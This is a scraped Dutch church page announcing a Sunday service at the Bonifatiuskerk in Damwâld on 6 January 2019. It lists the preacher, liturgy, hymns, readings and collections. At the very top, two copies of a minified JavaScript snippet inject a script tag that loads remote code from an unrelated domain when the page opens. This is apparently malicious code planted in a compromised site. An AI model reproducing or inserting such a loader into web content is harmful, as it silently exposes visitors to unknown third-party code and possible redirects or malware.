;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 6 januari 2019 11:00 uur - PKN Damwâld
zondag 6 januari 2019
11:00 uur
Voorbereiding Heilig Avondmaal / Let op ! Aanvangstijd is aangepast !

Kerkdienst zondag 6 januari 2019 11:00 uur

Informatie

Voorganger:Ds. K. van Marrum, Feanwâlden
Mededeling:Voorbereiding Heilig Avondmaal / Let op ! Aanvangstijd is aangepast !
Liturgie
Lied voor de dienst Elb 161
Welkom
Intochtlied: Ps. 145: 1 en 2
Groet en votum
Gebodslezing: Romeinen 8: 5-8
Gebed
We zingen: Elb 376
Genadeverkondiging: Romeinen 8: 3, 9-11
We zingen: Gz 140
We lezen: Handelingen 2: 37 – 42
We zingen: Gezang 242: 3 en 7.
Prediking .
We zingen: Gezang 303: 1, 2 en 5.
Gebeden
Collecte
Slotlied: Gezang 444.
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: SOS kinderdorpen

SOS Kinderdorpen zet zich in voor kinderen die er alleen voor staan. Want over de hele wereld zijn er kinderen die door armoede, ziekte of oorlog de zorg van hun ouders verliezen. Zij hebben geen basis om een toekomst op te bouwen. Wij zorgen er voor dat deze kinderen op kunnen groeien in een liefdevol gezin.

Tweede collecte: Kerk
Uitganscollecte: Kerk